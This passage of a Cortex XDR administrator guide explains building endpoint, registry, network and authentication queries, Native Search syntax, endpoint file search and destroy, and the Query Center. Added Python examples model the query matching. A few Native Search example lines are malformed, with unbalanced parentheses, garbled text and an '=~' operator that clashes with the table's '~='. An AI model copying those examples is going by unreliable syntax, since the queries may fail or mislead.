STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:


• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create a Registry Query


From the Query Builder you can investigate connections between registry activity, processes, and
endpoints.

Some examples of registry queries you can run include:
• Modified registry keys on specific endpoints.
• Registry keys related to process activity that exist on specific endpoints.
To build a registry query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select REGISTRY.

STEP 3 | Enter the search criteria for the registry events query.
• Registry action—Select the type or types of registry actions you want to search: Key Create, Key
Delete, Key Rename, Value Set, or Value Delete.
• Registry attributes—Define any additional registry attributes for which you want to search. By
default, Cortex XDR will return the events that match the attribute you specify. To exclude an
attribute value, toggle the = option to =!. Attributes are:
• KEY NAME—Registry key name.
• DATA—Registry key data value.
• REGISTRY FULL KEY—Full registry key path.
• KEY PREVIOUS NAME—Name of the registry key before modification.
• VALUE NAME—Registry value name.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:


• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create an Event Log Query


From the Query Builder you can search Windows event log attributes and investigate event logs across
endpoints with a Cortex XDR agent installed.

Some examples of event log queries you can run include:
• Critical level messages on specific endpoints.
• Message descriptions with specific keywords on specific endpoints.
To build an event log query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select EVENT LOG.

STEP 3 | Enter the search criteria for your Windows event log query.

Define any event attributes for which you want to search. By default, Cortex XDR will return the events
that match the attribute you specify. To exclude an attribute value, toggle the = option to =!. Attributes
are:
• PROVIDER NAME—The provider of the event log.
• USERNAME—The username associated with the event.
• EVENT ID—The unique ID of the event.
• LEVEL—The event severity level.
• MESSAGE—The description of the event.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:


• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 5 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 6 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 7 | When you are ready, View the Results of a Query.

Create a Network Connections Query


From the Query Builder you can investigate network events stitched across endpoints and the Palo Alto
Networks next-generation firewalls logs.

Some examples of network queries you can run include:
• Source and destination of a process.
• Network connections that included a specific App ID.
• Processes that created network connections.
• Network connections between specific endpoints.
To build a network query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select NETWORK CONNECTIONS.

STEP 3 | Enter the search criteria for the network events query.
• Network attributes—Define any additional network attributes for which you want to search. Use a
pipe (|) to separate multiple values (for example 80|8080). By default, Cortex XDR will return the
events that match the attribute you specify. To exclude an attribute value, toggle the = option to =!.
Options are:
• APP ID—App ID of the network.
• PROTOCOL—Network transport protocol over which the traffic was sent.
• SESSION STATUS
• FW DEVICE NAME—Firewall device name.
• FW RULE—Firewall rule.
• FW SERIAL ID—Firewall serial ID.
• PRODUCT
• VENDOR
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to a specific source:

Specify one or more attributes for the source.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• HOST NAME—Name of the source.
• HOST IP—IP address of the source.
• HOST OS—Operating system of the source.
• PROCESS NAME—Name of the process.
• PROCESS PATH—Path to the process.
• CMD—Command-line used to initiate the process including any arguments, up to 128 characters.
• MD5—MD5 hash value of the process.
• SHA256—SHA256 hash value of the process.
• PROCESS USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signature Unavailable, Signed, Invalid Signature,
Unsigned, Revoked, Signature Fail.
• PID—Process ID of the parent process.
• IP—IP address of the process.
• PORT—Port number of the process.
• USER ID—ID of the user who executed the process.
• Run search for both the process and the Causality actor—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR app
identified as being responsible for initiating the process tree. Select this option if you want to apply the
same search criteria to the causality actor. If you clear this option, you can then configure different
attributes for the causality actor.

STEP 5 | (Optional) Limit the scope to a destination.


Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
Specify one or more of the following attributes:
• REMOTE IP—IP address of the destination.
• COUNTRY—Country of the destination.
• Destination TARGET HOST, NAME, PORT, HOST NAME, PROCESS USER NAME, HOST IP, CMD,
HOST OS, MD5, PROCESS PATH, USER ID, SHA256, SIGNATURE, or PID

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create an Authentication Query


From the Query Builder you can investigate authentication activity across all ingested authentication logs
and data.

Some examples of authentication queries you can run include:
• Authentication logs by severity
• Authentication logs by event message
• Authentication logs for a specific source IP address
To build an authentication query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select AUTHENTICATION.

STEP 3 | Enter the search criteria for the authentication query.


By default, Cortex XDR will return the activity that matches all the criteria you specify. To exclude a
value, toggle the = option to =!.

STEP 4 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 5 | When you are ready, View the Results of a Query.

Query Across All Entities


From the Query Builder you can perform a simple search for hosts and processes across all file events,
network events, registry events, process events, and Windows event logs.

Some examples of queries you can run across all entities include:
• All activities on a host
• All activities initiated by a process on a host.
To build a query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select ALL ACTIONS.

STEP 3 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 4 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:


• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 5 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 6 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 7 | When you are ready, View the Results of a Query.
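The Query Builder procedures above share one value syntax: a pipe (|) separates alternatives, an asterisk (*) matches any run of characters, and the = / =! toggle decides whether a criterion must match or must not match. The following Python block is an added example written for this page, not Cortex XDR code, that models that syntax over a constructed set of process events so the matching rules can be checked offline. The record field names (host_name, host_os, name, path, signature, user_name) and the sample events are assumptions chosen for the example.

```python
"""Model of the Query Builder value syntax: pipe-separated alternatives, an
asterisk wildcard, and a per-criterion =/=! toggle. Illustrative code for this
example, not the Cortex XDR implementation; record layout is assumed."""
import fnmatch
from typing import Dict, List, Tuple

# Constructed sample process events; nothing here comes from a real tenant.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host_name": "WS-FIN-01", "host_os": "Windows", "name": "powershell.exe",
     "path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "signature": "Signed", "user_name": "alice"},
    {"host_name": "WS-FIN-02", "host_os": "Windows", "name": "cmd.exe",
     "path": r"C:\Windows\System32\cmd.exe",
     "signature": "Signed", "user_name": "bob"},
    {"host_name": "WS-FIN-02", "host_os": "Windows", "name": "updater.exe",
     "path": r"C:\Users\bob\AppData\Local\Temp\updater.exe",
     "signature": "Unsigned", "user_name": "bob"},
    {"host_name": "SRV-DB-01", "host_os": "Linux", "name": "bash",
     "path": "/bin/bash", "signature": "N/A", "user_name": "root"},
]


def value_matches(criterion: str, actual: str) -> bool:
    """True if `actual` matches any pipe-separated alternative in `criterion`.
    An asterisk matches any run of characters. Matching is case-insensitive,
    which is the behaviour a Windows file name comparison needs."""
    return any(fnmatch.fnmatchcase(actual.lower(), alt.strip().lower())
               for alt in criterion.split("|") if alt.strip())


# A criterion is (field, value, negate); negate=True models the =! toggle.
Criterion = Tuple[str, str, bool]


def run_query(events: List[Dict[str, str]], criteria: List[Criterion]):
    """Return the events that satisfy ALL criteria (the builder's default AND)."""
    def satisfies(ev: Dict[str, str]) -> bool:
        for field, value, negate in criteria:
            matched = value_matches(value, ev.get(field, ""))
            if matched == negate:      # =  requires a match, =! requires no match
                return False
        return True
    return [ev for ev in events if satisfies(ev)]


def unsigned_user_dir_processes(events=SAMPLE_EVENTS):
    """Windows processes launched from a user profile that are not Signed:
    the kind of scope a 'Limit the scope to a specific acting process' step
    would express with PATH = C:\\Users\\* and SIGNATURE =! Signed."""
    return run_query(events, [
        ("host_os", "Windows", False),
        ("path", r"C:\Users\*", False),
        ("signature", "Signed", True),
    ])


def shell_on_finance_hosts(events=SAMPLE_EVENTS):
    """cmd.exe or powershell.exe on hosts whose name starts with WS-FIN-."""
    return run_query(events, [
        ("host_name", "WS-FIN-*", False),
        ("name", "cmd.exe|powershell.exe", False),
    ])


if __name__ == "__main__":
    for ev in unsigned_user_dir_processes():
        print("unsigned from user dir:", ev["host_name"], ev["path"])
    for ev in shell_on_finance_hosts():
        print("shell on finance host:", ev["host_name"], ev["name"])
```

The negation is applied per criterion rather than to the whole query, which is what the =! toggle next to each attribute does in the builder; combining several criteria still ANDs them, matching the "activity that matches all the criteria you specify" default stated in the steps.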

Native Search
To search across all available logs and data in Cortex XDR, you can use the text-based Native Search. The
Native Search is available on the top right of the Query Builder.
To facilitate simple and complex text-based queries, you can enter fields based on the log’s metadata
hierarchy (core fields, vendor fields, or log types), the operator, the field value, and the timeframe. For
simplicity, the Native Search provides auto-completion—based on the known log fields—as you type. You
can also use Regex (except with IP addresses and ranges) and wildcards in your queries, and you can string
together multiple queries using the and or or keywords.

For examples of text-based queries, see Native Search Examples.

Core Fields for Native Search
When you specify core fields without any other search criteria, the Native Search queries the field value
across all data and logs that contain that field type. To further refine the results and specify context, you
can combine core fields with other criteria such as vendor or log type. You can build queries in Native
Search for any of the following core fields:
• ip
• source_ip
• destination_ip
• hash
• host_name
• user_name
• process_name
• process_path
Vendor Fields for Native Search
To search for logs or data from a specific vendor, you can refine your query by vendor and product.
The query fields are hierarchical. To construct a query, separate each field in the hierarchy with periods.
Examples of vendor fields include:
• Search for results from all Palo Alto Networks products—PANW
• Search for results from Cisco ASA firewalls—Cisco.ASA

Vendor          Product

PANW            NGFW
                Cortex Agent

Checkpoint      FW1/VPN1

Cisco           ASA
                Firepower

Okta            MFA

Microsoft       Azure AD

Corelight       Corelight sensor

Fortinet        Fortigate

Log Types for Native Search


You can construct queries for the following types of logs and log subtypes.

Log Type                Log Subtype

process_actions         • process_executed
                        • process_injected

registry_actions        • key_created
                        • key_renamed
                        • key_deleted
                        • value_set
                        • value_deleted

file_actions            • file_created
                        • file_deleted
                        • file_renamed
                        • file_written
                        • file_read

network_connections     • outbound_connection
                        • inbound_connection
                        • failed_connection

event_logs              • endpoint_eventlog
                        • dc_eventlog

authentication          • successful_authentication
                        • failed_authentication

image_load              • image_load_success
                        • change_page_protection
Operators

Operator                Description

=                       Show results equal to a value.

!=                      Show results that are not equal to a value.

~=                      Show results that are equal to a Regex pattern match. Not supported with IP
                        addresses or ranges.

!~=                     Show results that are not equal to a Regex pattern match. Not supported with IP
                        addresses or ranges.

contains                Show results that contain a value.

not contains            Show results that do not contain a value.

in (list, range)        Show results including one or more matches in a list or range. Not supported with
                        IP addresses or ranges.

not in (list, range)    Show results excluding one or more matches in a list or range. Not supported with
                        IP addresses or ranges.
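To make the operator semantics concrete, here is an added Python example (written for this page, not the Cortex XDR search engine) that applies the operators from the table above to a constructed set of records. It models the one restriction the table repeats: regex and list operators are refused on the IP core fields, while the = and != operators accept the asterisk wildcard the page's own "ip != 10.0.*" example relies on. Field names, the record layout, and the sample records are assumptions for the example; ranges in "in (list, range)" are not modelled.

```python
"""Illustrative evaluator for the Native Search operators. Example code for
this guide page, not Cortex XDR's parser; records and field names are assumed."""
import re
from fnmatch import fnmatchcase
from typing import Any, Dict, List, Tuple

# Core fields that hold addresses; regex and list operators are not supported on them.
IP_FIELDS = {"ip", "source_ip", "destination_ip"}

# Constructed sample records; the addresses are documentation ranges, not real hosts.
RECORDS: List[Dict[str, Any]] = [
    {"logtype": "network_connections", "ip": "10.0.3.7",
     "host_name": "SF-WS01", "process_name": "chrome.exe"},
    {"logtype": "network_connections", "ip": "198.51.100.157",
     "host_name": "NY-WS02", "process_name": "outlook.exe"},
    {"logtype": "file_actions", "subtype": "file_created", "ip": "10.0.9.2",
     "host_name": "SF-LAPTOP3", "process_name": "winword.exe"},
    {"logtype": "authentication", "ip": "192.0.2.44",
     "host_name": "DC01", "user_name": "svc_backup"},
]

Term = Tuple[str, str, Any]   # (field, operator, value)


def term_is_supported(field: str, op: str) -> bool:
    """Regex and list/range operators are not supported on IP fields."""
    return not (field in IP_FIELDS and op in ("~=", "!~=", "in", "not in"))


def _wildcard_eq(actual: str, value: str) -> bool:
    # '=' and '!=' accept an asterisk wildcard, e.g. "10.0.*"; comparison is case-insensitive.
    return fnmatchcase(actual.lower(), value.lower())


def evaluate(record: Dict[str, Any], field: str, op: str, value: Any) -> bool:
    """Apply one <field> <operator> <value> term to a record."""
    if not term_is_supported(field, op):
        raise ValueError(f"operator {op!r} is not supported on IP field {field!r}")
    if field not in record:
        return False              # a record without the field never matches
    actual = str(record[field])
    if op == "=":
        return _wildcard_eq(actual, value)
    if op == "!=":
        return not _wildcard_eq(actual, value)
    if op in ("~=", "!~="):
        hit = re.search(value, actual, re.IGNORECASE) is not None
        return hit if op == "~=" else not hit
    if op == "contains":
        return value.lower() in actual.lower()
    if op == "not contains":
        return value.lower() not in actual.lower()
    if op in ("in", "not in"):
        hit = actual.lower() in {str(v).lower() for v in value}
        return hit if op == "in" else not hit
    raise ValueError(f"unknown operator {op!r}")


def search(terms: List[Term], records=RECORDS) -> List[Dict[str, Any]]:
    """AND every term together (the 'and' keyword) and return matching records."""
    return [r for r in records if all(evaluate(r, f, op, v) for f, op, v in terms)]


def sf_file_create_delete_events(records=RECORDS):
    """Model of: logtype = file AND subtype IN (file create, file delete) AND hostname contains SF."""
    return search([("logtype", "=", "file_actions"),
                   ("subtype", "in", ["file_created", "file_deleted"]),
                   ("host_name", "contains", "SF")], records)


def connections_outside_10_0(records=RECORDS):
    """Model of: ip != 10.0.*  (wildcard, because regex is refused on an IP field)."""
    return search([("ip", "!=", "10.0.*")], records)


def chrome_network_connections(records=RECORDS):
    """Regex is fine on a non-IP field: process name starting with 'chrome'."""
    return search([("logtype", "=", "network_connections"),
                   ("process_name", "~=", r"^chrome")], records)


if __name__ == "__main__":
    print([r["host_name"] for r in sf_file_create_delete_events()])
    print([r["ip"] for r in connections_outside_10_0()])
```

The wildcard-versus-regex split matters in practice: a pattern such as 10.0.* written against an IP field is a wildcard, not a regex, so it matches the literal dots and never the character class a regex author might expect.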

Native Search Examples

Search

logtype = file AND subtype IN ("file create", "file delete") and hostname contains SF

network connections AND palo alto networks.app id = facebook

okta.sso AND ip != 10.0.*

palo alto networks.file create.file name =~ ".+?"

event log AND (palo alto networks.event log id = 41783 OR hostname =~ la^xcortex xdr agent AND palo alto networks.dst process name CONTAINS chrome

logtype IN ("network connections", execution, injection) AND (palo alto networks.app id = chrome OR
process name = chrome)

ip = 198.51.100.157 AND palo alto

ip = 198.51.100.157 and key.name =~ "\wSomestring\w"

Search for Files on Endpoints


You can use the text-based Native Search to search for files on endpoints. Unlike the Cortex XDR File
Query which queries only the EDR data reported back from the agent, File Search initiates a search on the
endpoint local files database, and can include deleted files as well. You can use file search to search for files
by hash or path, on all your Windows endpoints. File Search is a stand-alone query in Cortex XDR, and you
cannot combine File Search with other queries or core fields in Native Search.

The Cortex XDR agent does not include in the local files inventory the following:
• Information about files that existed on the endpoint and were deleted before the Cortex
XDR agent was installed.
• Information about files where the file size exceeds the maximum file size for hash
calculations that is preconfigured in Cortex XDR.
• If the Agent Settings Profile on the endpoint is configured to monitor common file types
only, then the local files inventory includes information about these file types only. You
cannot search or destroy file types that are not included in the list of common file types.

STEP 1 | From Cortex XDR > Investigation > Query Builder, select Native Search.

STEP 2 | Enter your search query in the following format:


<Action name> <Action mandatory parameters> <Action optional parameter>
• To search for all existing instances of a file:

• <Action name>—find_existing_files
• <Action mandatory parameters>—Search according to file hash or file path (you can
enter the full path, or enter a partial path using ‘*’). For Windows endpoints, the file path must
begin with a drive name, for example: c:\. Additionally, you must specify the exact path folder
hierarchy, for example c:\users\user\file.exe. You must specify the exact path folder
hierarchy also when you replace folder names with wildcards, by using a wildcard for each folder
in the hierarchy. For example, c:\*\*\file.exe
• <Action optional parameter>—You can narrow down the search to a specific host
by adding HOSTNAME = <hostname> or to multiple hosts by adding HOSTNAME in
<hostname1, hostname2>.
For example,

find_existing_files path=c:\windows\system32\ping.exe and hostname=ADI-PC


• To search for all existing and deleted instances of a file:
• <Action name>—find_existing_or_deleted_files
• <Action mandatory parameters>—You can search by file hash only.
• <Action optional parameter>—You can narrow down the search to a specific host
by adding HOSTNAME = <hostname> or to multiple hosts by adding HOSTNAME in
<hostname1, hostname2>.
For example:

find_existing_or_deleted_files sha256=2867450a7f720c207b95492458c19acc7fe3183a84b4db48b637e65ad816f635 and hostname in PC

STEP 3 | Run the search.

STEP 4 | Review the search results in real-time.


The file search results include the following details. If not all endpoints in the query scope are
connected or the search has not completed, the search continues and the search action remains in
Pending status in the Action Center.
• The search query syntax.
• Counters indicating the number of connected and disconnected endpoints on which Cortex XDR
performed the search.
• Counters indicating the number of endpoints where the file currently exists and the number of
endpoints where the file does not exist.
• A detailed list of all the file instances that were found in the search.
You can track and manage the search in the Action Center.

STEP 5 | (Optional) Retrieve the file from the endpoint.


Right-click the file and select Get file to upload the file to Cortex XDR for further examination before
you destroy it.

STEP 6 | (Optional) Destroy the file on the endpoint.


When you destroy a file, you permanently remove it. You can destroy the file directly from the search
results. Right-click the file and select Destroy By path or Destroy by hash.
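The path rules in Step 2 are easy to get wrong when writing a search by hand: the path must start with a drive, the folder hierarchy must be spelled out level by level, and a wildcard stands in for one folder, never for several. The following Python block is an added example written for this page, not Cortex XDR's own parser. It parses the two file search actions described above into their parts and applies the documented hierarchy rule to candidate paths, so a query can be checked before it is submitted. It assumes the hash parameter is always given as sha256= (the only hash key shown on the page) and models only the Windows path rules the text states.

```python
"""Parser and path-matching model for find_existing_files and
find_existing_or_deleted_files. Example code, not Cortex XDR's implementation;
it encodes the rules stated in the guide and assumes a sha256= hash key."""
import re
from fnmatch import fnmatchcase
from typing import Dict, List, Optional

# Which mandatory parameter each action accepts (assumption: hash is given as sha256=).
ACTIONS = {
    "find_existing_files": {"path", "sha256"},          # search by path or by hash
    "find_existing_or_deleted_files": {"sha256"},       # hash only, per the guide
}

_HOST_FILTER = re.compile(r"\s+and\s+hostname\s*(=|in)\s*(.+)$", re.IGNORECASE)


def validate_windows_path(path: str) -> None:
    """A Windows path must begin with a drive name such as c:\\ and contain no
    empty folder segment (a wildcard may replace a folder, but not omit one)."""
    if not re.match(r"^[A-Za-z]:\\", path):
        raise ValueError("Windows file path must begin with a drive name, e.g. c:\\")
    if any(segment == "" for segment in path.split("\\")[1:]):
        raise ValueError("path contains an empty folder segment")


def parse_file_search(query: str) -> Dict[str, object]:
    """Split '<Action name> <mandatory parameter> [and hostname ...]' into parts.
    Raises ValueError when the query breaks a rule the guide states."""
    tokens = query.strip().split(None, 1)
    if len(tokens) != 2 or tokens[0] not in ACTIONS:
        raise ValueError("query must start with a supported action name")
    action, rest = tokens
    hostnames: Optional[List[str]] = None
    m = _HOST_FILTER.search(rest)
    if m:                                   # optional scope: hostname = X or hostname in <A, B>
        raw = m.group(2).strip().strip("<>")
        hostnames = ([h.strip() for h in raw.split(",")]
                     if m.group(1).lower() == "in" else [raw])
        rest = rest[:m.start()]
    key, _, value = rest.strip().partition("=")
    key, value = key.strip().lower(), value.strip()
    if key not in ACTIONS[action] or not value:
        raise ValueError(f"{action} accepts only {sorted(ACTIONS[action])}")
    if key == "path":
        validate_windows_path(value)
    return {"action": action, key: value, "hostnames": hostnames}


def path_matches(pattern: str, actual: str) -> bool:
    """Level-by-level match: each folder level in the pattern must correspond to
    exactly one level in the real path, so c:\\*\\*\\file.exe matches
    c:\\users\\alice\\file.exe but neither c:\\file.exe nor c:\\a\\b\\c\\file.exe."""
    p_levels = pattern.lower().split("\\")
    a_levels = actual.lower().split("\\")
    return (len(p_levels) == len(a_levels)
            and all(fnmatchcase(a, p) for p, a in zip(p_levels, a_levels)))


if __name__ == "__main__":
    q = parse_file_search(r"find_existing_files path=c:\windows\system32\ping.exe and hostname=ADI-PC")
    print(q)
    print(path_matches(r"c:\*\*\file.exe", r"C:\Users\alice\file.exe"))
```

The level-count check in path_matches is the point of the example: a pattern with two wildcards only finds files exactly two folders below the drive root, so a search for a file that might sit at varying depths needs one query per depth, or a hash-based search instead.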

Cortex XDR Query Center
From the Query Center you can manage and view the results of all simple and complex queries created
from the Query Builder. The Query Center displays information about the query including the query
parameters and allows you to adjust and rerun queries as needed.

The following table describes the fields that are available for each query in alphabetical order.

Field Description

CREATED BY User who created or scheduled the query.

NUM OF RESULTS Number of results returned by the query.

QUERY DESCRIPTION The query parameters used to run the query.

QUERY ID Unique identifier of the query.

QUERY NAME For saved queries, the Query Name identifies the query specified by
the administrator. For scheduled queries, the Query Name identifies
the auto-generated name of the parent query. Scheduled queries also
display an icon to the left of the name to indicate that the query is
recurring.

QUERY STATUS Status of the query:
• Queued—The query is queued and will run when there is an available
slot.
• Running
• Failed
• Partially completed—The query was stopped after exceeding the
maximum number of permitted results (100,000). To reduce the
number of results returned, you can adjust the query settings and
rerun.
• Stopped—The query was stopped by an administrator.
• Completed
• Deleted—The query was pruned.

RESULTS SAVED Yes or No.

TIMESTAMP Date and time the query was created.

Manage Your Queries


From the Query Center, you can view all manual and scheduled queries. The Query Center also provides
management functions that allow you to modify, rerun, schedule, and remove queries. You can also refresh
the page to view updated status for queries, filter available queries based on fields in the query table, and
manage the fields presented in the Query Center.

• View the Results of a Query
• Rename a Query
• Modify a Query
• Rerun or Schedule a Query to Run
• Manage Scheduled Queries
View the Results of a Query
After you run a query, you can view the events that match your search criteria. To view the results:

STEP 1 | Select INVESTIGATION > Query Center.

STEP 2 | Locate the query for which you want to view the results.
If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right-click anywhere in the query row, select Show results, and choose whether to open the
query in the same tab or a new tab.

STEP 4 | (Optional) If you want to refine your results, you can Modify a query from the query results.

STEP 5 | (Optional) If desired, Export to file to export the results to a tab-separated values (TSV) file.

STEP 6 | (Optional) Perform additional investigation on the alerts.


From the right-click pivot menu:
• Analyze the alert and open the Causality View.
• Investigate in Timeline.
• View event log message to view the event details.

Modify a Query
After you run a query you might find you need to change your search parameters such as to narrow the
search results or correct a search parameter. There are two ways you can modify a query: You can edit it in
the Query Center, or you can edit it from the results page. Both methods populate the criteria you specified
in the original query in a new query which you can modify and save.

• Create a query based on an existing query.


1. Select INVESTIGATION > Query Center.
2. Right-click anywhere in the query and then select Save as a new query.
3. If desired, enter a descriptive name to identify the query.
4. Modify the search parameters as desired.
5. Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in
the Query Center.

• Modify an existing query from the Query Center.

1. Select INVESTIGATION > Query Center.
2. Right-click anywhere in the query and then select Edit a query.
3. Modify the search parameters as desired.
4. Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in
the Query Center.

• Modify a query from the query results.


1. View the Results of a Query.
2. At the top of the query, click the pencil icon to the right of the query parameters.
Cortex XDR opens the query settings page.
3. Modify the search parameters as desired.
4. Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query and review the result at a later time, or Run to run the query immediately and view the
results in the Query Center.

Rerun or Schedule a Query to Run


If you want to rerun a query, you can either schedule it to run on or before a specific date, or you can rerun
it immediately. Cortex XDR will create a new query in the Query Center. When the query completes, Cortex
XDR displays a notification in the notification bar.

• Rerun a query immediately.


1. Select INVESTIGATION > Query Center.
2. Right-click anywhere in the query and then select Rerun Query.
Cortex XDR initiates the query immediately.

• Schedule a query to run:


1. Select INVESTIGATION > Query Center.
2. Right-click anywhere in the query and then select Schedule.
3. Choose the desired schedule option and the date and time the query should run:

• Run one time query on a specific date
• Run query by date and time—Schedule a recurring query at a frequency of your choice.
4. Click OK to schedule the query.
Cortex XDR creates a new query and schedules it to run on or by the selected date and time.
5. View the status of the scheduled query on the Cortex XDR Scheduled Queries page.
At any time, you can view or make changes to the query on the Scheduled Queries page. For
example, you can edit the frequency, view when the query will next run, or disable the query.

Rename a Query
If needed, you can rename a query at any time. If you later rerun the query, the new query will run using the
new name. You can also edit the name of a query when you Modify a Query.

STEP 1 | Select INVESTIGATION > Query Center.

STEP 2 | Right-click anywhere in the query and then select Rename.

STEP 3 | Enter the new query name and click OK.

Quick Launcher
The Quick Launcher provides a quick, in-context shortcut that you can use to search for information,
perform common investigation tasks, or initiate response actions from any place in the Cortex XDR app. The
tasks that you can perform with the Quick Launcher include:
• Search for a host, username, IP address, domain, filename, file path, or timestamp.

For hosts, Cortex XDR displays results for exact matches but supports the use of a wildcard
(*), which changes the search to return matches that contain the specified text. For
example, a search for compy-7* returns any hosts beginning with compy-7, such as
compy-7000, compy-7abc, and so forth.
• Begin Go To mode. Enter a forward slash (/) followed by your search string to filter and navigate to Cortex
XDR pages. For example, / rules searches for all pages that include rules and allows you to navigate
to those pages. Press Esc to exit Go To mode.
• Add processes by SHA256 hash to the allow list or block list
• Add domains or IP addresses to the EDL block list
• Create a new IOC for an IP address, domain, hash, filename, or filepath
• Isolate an endpoint
• Open a terminal to a given endpoint
• Initiate a malware scan on an endpoint
You can bring up the Quick Launcher either using the default keyboard shortcut—Ctrl+Shift+X on
Windows or CMD+Shift+X on macOS—or using the Quick Launcher icon located in the top navigation bar.
To change the default keyboard shortcut, navigate to Settings > General > Keyboard Shortcuts. The
